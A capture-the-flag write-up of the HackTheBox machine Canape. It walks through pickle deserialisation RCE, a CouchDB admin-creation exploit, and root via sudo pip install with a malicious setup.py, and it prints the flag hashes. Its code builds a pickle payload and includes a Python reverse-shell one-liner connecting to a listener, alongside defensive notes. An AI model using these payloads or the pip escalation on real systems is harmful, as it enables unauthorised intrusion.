# Canape

## Canape - 10.10.10.70

### Target Enumeration:

OS: Linux

IP: 10.10.10.70

User: bce918696f293e62b2321703bb27288d

Root: 928c3df1a12d7f67d2e8c2937120976d

### Vulnerability Exploited:

Pickle Code Injection

### Privilege Escalation:

The user homer is allowed to run pip install as root via sudo.

### Exploiting the host:

Nmap (used sparta as I was being lazy)

![](https://lh6.googleusercontent.com/2ez1SiQ29UBFdXQ--KyFbY7witATIIp2D-lQ0MQKwax9XJrlo4hQQbJ3XxtUmcwP8PaGqabkW6M_y3wzLiV4PuFigzAgZsatgINdYwkP06s9DQnG1v2z_re_5q5guDKZ41yv3Ybd)

The scan shows a .git repository on the web server.

The application itself produced lots of false positives.

The .git repo gives us an address from which to download the source code.

<div align="left"><img src="https://lh4.googleusercontent.com/cSbVoGaglOBYbgXWDbg7OgAewZCpC57C_PJHLdGWU_uypjPYotFBYMjOKbYpZxSe8efVZo5zGSVlGHFf8IsPa8ZpZHbEY-5mLVHQ1XQjNhOiRwhHVCncmCtsmfYyVFXcPMff5zWE" alt=""></div>

Add git.canape.htb to our /etc/hosts file and clone the repo.

![](https://lh3.googleusercontent.com/MVZLve2tTC_872yIxsDO_oY00tgsaBBwKCfMr8cq8oZ8HUC-s44umShzJJF8semveTGIlIPMeETd4mqJQVWizhARaPx79N5PNq8Vp5Rqy8wtpD__eGQFpkRuHbh4hGMRNuNV3az9)

Now that we have the source code we can see it is vulnerable to pickle code injection: user-supplied data is handed to pickle for deserialisation, and pickle will call whatever callable the stream names while loading, so a crafted pickle executes arbitrary code on the server.

Researching the issue led us to <https://lincolnloop.com/blog/playing-pickle-security/>

I had several issues getting the reverse shell working and had to look online for a working Python exploit.
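To make the primitive concrete, the following is an added example (not the box's application code and not the exploit linked below): an object whose `__reduce__` makes pickle call a function on load, the unchecked `pickle.loads` the app effectively performs, and a whitelisting Unpickler that refuses it. The payload runs a harmless echo rather than a reverse shell so it can be observed safely; the command is a constructed stand-in.

```python
import io
import pickle
import subprocess


class PickleRce:
    """Object whose pickled form calls a function when it is loaded.

    pickle reconstructs the object by calling the callable returned from
    __reduce__ with the given arguments. A real payload would use os.system
    with a reverse shell; this constructed example runs a harmless echo.
    """

    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        return (subprocess.check_output, (self.command,))


def build_payload(command=("echo", "pickle executed")):
    """Serialise the malicious object; these bytes are what an attacker submits."""
    return pickle.dumps(PickleRce(list(command)))


def vulnerable_load(data):
    """What the vulnerable app does: unpickle attacker-controlled bytes unchecked."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: only whitelisted globals may be resolved during unpickling.

    Plain containers (dict, list, str, int) never need a global lookup, so a
    benign data structure still loads; any GLOBAL opcode naming something
    outside the whitelist (e.g. subprocess.check_output) is rejected.
    """

    ALLOWED = {
        ("builtins", "dict"),
        ("builtins", "list"),
        ("builtins", "str"),
        ("builtins", "int"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_load_rejects(data):
    """True if the hardened loader refuses the payload."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def round_trip_safe(obj):
    """Benign data still survives the hardened loader."""
    return safe_load(pickle.dumps(obj))


if __name__ == "__main__":
    payload = build_payload()
    print(vulnerable_load(payload))      # the echo ran during pickle.loads
    print(safe_load_rejects(payload))    # True
    print(round_trip_safe({"a": [1, 2]}))
```

The whitelist approach only helps if the application genuinely needs pickle; the better fix is to use a data-only format such as JSON for anything that crosses a trust boundary.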

![](https://lh6.googleusercontent.com/j5Xa45qEKHt8PRM-mgV3XCIbouTPWtfVahWL7zo0vlnr67A-3d6E9GQW-vkgxGdM72cx5TgEvDgNxyF1_dKQoZJdcf_lVCzSaixlDpIffbdCoL5Od95sPo4YJNtpPu-a14TQB7ac)

<https://ironhackers.es/en/writeups/writeup-canape-hackthebox-2/>  :)

Execute the code to receive a reverse shell.

![](https://lh3.googleusercontent.com/xYhStTGqGkHUO5YPiN-8BWviC1jEPMHkpXHIj5jjff1vaSS63ZumVR-WxYG7rEROtFCToZ4x8adPvfQE91M8sy0NIrWof7xEaIVweYXif-RxpXp6TAqcu-hwEnGWMktTnocqIZyO)

Now we have a shell as www-data.

Enumerating the system and looking at the initial git code gave us a potential route:

![](https://lh4.googleusercontent.com/aMwV2gt_KrTPVL6RjdQreAyDdp4GBZ_C6sTXCh5pVbBkMx7ri1maRqV26iuAwg6flPXyyKQAEJ7yJBf1nBe-RdMau51DT4m4p66OSXDwJieds1l7lbckbsZUBUdGkPFeqh9p-hx5)

We could see it was listening locally:

![](https://lh4.googleusercontent.com/-wrb7QNReZpT4BYfumSu1WVDuVmhXVYqZeMtOKctjviCxrnGdafrwN5hFPDohMaEBY3Zk76_KgK5MVOWB4t3GOVWlVPGaRup3MTnncxWA7nRPYoHpBufj9k2AgApxFR0l1q4vZm2)

Reviewing it gave us a version to check:

![](https://lh5.googleusercontent.com/mUMhK57HjNe2SnU4rr_4fbGa1mPLE5g9jA5eiBzJiFNF-sA-kaLcj9OgeQnIs-CjsW4j52f5qdJPyGLaFnRDeeMl0bYs5CEHjf-f3Xyu7oAVZAcX1ir0m8LmXp8bEXCaOF5ymcqi)

Searchsploit gave us a potential exploit:

![](https://lh5.googleusercontent.com/OvhFpwOb7IB3racRwX6cC62Jb6CFAt-saYesEEYWahBt1ndhyZk2YmGDNjOKVMZSRgvyO5_PHgjWzfFb_KJMuT1gKqlFJD6BLYTRNFIn5hX4PlGonyPmX_4YScw5V1i4-zFi4UA6)

This did not work, so we kept looking online and found

<https://www.exploit-db.com/exploits/44498/>

This is the Apache CouchDB 1.7.0/2.x privilege escalation (CVE-2017-12635), which abuses the fact that CouchDB's two JSON parsers treat duplicate keys differently, so a user document can be created with the _admin role without existing credentials. Running the following creates a user for us:

![](https://lh5.googleusercontent.com/3mKJLBfWd2doDP16toF0F5EXz6C9vZWp5620aCqVaOtBc195wVf7G222dGcHw6kSWkRciD2MdfpDsqy01hoqgLNlO7MVMPjiBzSOXItyE0IOirygaU2Q-Tcp7fYzeKLHsFn7szI9)

With that account we can now grab the passwords:

![](https://lh6.googleusercontent.com/5E11_8Qg68h3yhlhdxMzAmhcm4hi3gZmFzMeie012pOu4NNcfHIzdvpmGJ6_P_Gw5CAb_yWagcZ1ByfWzBlpYL9LJoB2_1dtKKynnm_gwmN9sSCmM8dGjlZjTMY3XKg84W5EzfCF)

Upgrade to a full TTY and su to the user homer (found in the passwd file), or log in via SSH with the recovered password:

![](https://lh4.googleusercontent.com/RJdyHlslyauF_Ldq40y_dMZF4BzL14uARnuaeRvUFA-lZIhqhGJsPCImzQ8j7S3ZZGxPOiS6kvnrPK3p5X0CdhBYh7hDKxlfXPXu1tJ5C8T8Ql0aE2j7eLsLEiBItuzGRpVjrClk)

Upgrading the current shell:

![](https://lh4.googleusercontent.com/80tPmBqeM7cZqOGFyp6Q_nZ1INXWrvkV-e6rCpdsicYoYmLS-WX3cpBA39mKMmtnpgsPzThHAn9Rj8rdPveQzWo6qrCa201FIK4X5c0W_Ngt8clN7D69-ON4iZ1tvcNMjZEx07HD)

Grab the user flag:

<div align="left"><img src="https://lh3.googleusercontent.com/BDy63llTlHZ8aX6XvlVrM593pHwwQcI4BCmoqMz19Z3yCVPQPbWYcQ-C85GlFVneg2sIGYPPD_PMhJYVnKDnAmro0RdoYLvkuJry28R6q6Yvewn_CzzSAoh5GiRoi4a1tmx8fLX0" alt=""></div>

As the user homer we can run pip install as root:

![](https://lh3.googleusercontent.com/2aCs9eMh1yP_AujfPYRhbQ0hyeE_5fi_AkgwSiog8cYIDHDsfwjOqbZT5993IK0BM9iNSaT4iSl4oUzYFPaSsLMYihpubFySHG9xttO0WfvyZ8R3Clu_valR8k8G5-gruPkurbdY)

Move to /dev/shm/ so that no other files in the working directory interfere with the install (pip install . packages up whatever is in the current directory).

Create the following basic Python reverse shell:

![](https://lh3.googleusercontent.com/1qGLTK5WBQMq1GMRkh9X9gSnDkrERjYltYrmMLcsWhKuwGshT4xirxpQy0oRQbjvGdKCUgcy7pyW17-Zb9svXv4T4ZgDVrbWf4Sve0WymnGkjIYLTaYkr9BFbLOyYlNHyEAFSIoN)

Copy it over to the target (via a web server) and name it setup.py so that pip will execute it.

Set up a nc listener on port 444.

Install the package with sudo pip install .

![](https://lh4.googleusercontent.com/vFj_uXP5PGbs256y-YIPiwTuky4tSrKFUfOHaBfawWKkH-L5m93hw4BGRlEx0-35OumpbdSce8mVsrDdDIv16_ksVYWiMUPDAMBdlogn6g3Ha8r8rF93hURqtGKbHNCadaGdif4Y)

Because setup.py is executed by the interpreter as soon as pip processes the package, the reverse shell runs as root and you receive a root shell:
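The following is an added example (not the writeup's own setup.py, which is only shown in the screenshot) that demonstrates the mechanism offline: it writes a setup.py whose module-level code runs the moment the file is evaluated, then invokes it the way pip does. The payload here is a constructed marker-file write that records the effective UID instead of the reverse shell; `reverse_shell_payload` returns the line that would take its place, with a placeholder listener address of 10.10.14.2:444 (an assumption, not an address from the page).

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Everything at module level in setup.py runs as soon as pip (or python) executes
# the file, before any package is built, with the privileges of the invoker.
# Under "sudo pip install ." that is root. PAYLOAD is substituted below.
SETUP_PY_TEMPLATE = textwrap.dedent("""\
    # setup.py: module-level code runs with the privileges of whoever invokes pip
    PAYLOAD
    try:
        from setuptools import setup
    except ImportError:                    # old interpreters without setuptools
        from distutils.core import setup
    setup(name="canape-privesc", version="0.0.1", py_modules=[])
""")


def reverse_shell_payload(lhost="10.10.14.2", lport=444):
    """The one-liner the writeup's setup.py would carry (constructed, not run here)."""
    return (
        "import os, socket, subprocess; "
        f"s = socket.socket(); s.connect(('{lhost}', {lport})); "
        "[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]; "
        "subprocess.call(['/bin/sh', '-i'])"
    )


def write_setup_py(directory, payload):
    """Drop a setup.py with PAYLOAD at module level into directory."""
    path = os.path.join(directory, "setup.py")
    with open(path, "w") as fh:
        fh.write(SETUP_PY_TEMPLATE.replace("PAYLOAD", payload))
    return path


def demo_setup_py_runs_code():
    """Evaluate setup.py the way pip would and report what the payload observed.

    Returns (ran, euid): ran is True if the marker the payload wrote exists,
    euid is the effective UID recorded by the payload (-1 if unavailable).
    Under sudo the same file would report euid 0.
    """
    with tempfile.TemporaryDirectory() as workdir:
        marker = os.path.join(workdir, "marker")
        # Benign stand-in for the reverse shell: record who executed setup.py.
        payload = (
            "import os; open(r'%s', 'w').write("
            "str(getattr(os, 'geteuid', lambda: -1)()))" % marker
        )
        write_setup_py(workdir, payload)
        # "python setup.py --name" is enough to trigger the module-level code;
        # pip install . runs the file the same way. The return code is ignored
        # because the payload fires before setup() is even imported.
        subprocess.run(
            [sys.executable, "setup.py", "--name"],
            cwd=workdir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
        if not os.path.exists(marker):
            return (False, -1)
        with open(marker) as fh:
            return (True, int(fh.read()))


if __name__ == "__main__":
    ran, euid = demo_setup_py_runs_code()
    print("payload executed:", ran, "as euid", euid)
    print("reverse shell line would be:", reverse_shell_payload())
```

The defensive point is the inverse of the attack: a sudo rule for pip install (or any tool that evaluates files it is pointed at, such as a build system or package manager) is equivalent to an unrestricted root shell, so it should never be granted to an unprivileged account.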

![](https://lh3.googleusercontent.com/Y7F-BGHJMS-4klUEM6iaWDH_nFEyEZgl2_enkg5ftEXDXnzT4QgfVEDhQzlCgZN_kdoZP6e9X0gOu4UfhV25nvtWSo8Gmm_WQkZ8CwnC_6jfsfk76w6WKn4USgKKCTeRvypusknN)

Grab the root flag:

<div align="left"><img src="https://lh5.googleusercontent.com/0Ed5m_arp1PcYlotjTOJd3qMwRWdOvudzIdedbOumT0uy8L1Ao4mqXnSe7wxjOrqoPPaXBzvybhXyrmGiJLDdnvFkPCPc8zL2-YO9kt8HR8PstKxf96EEMEVYY5meK8zRHYpPu6n" alt=""></div>

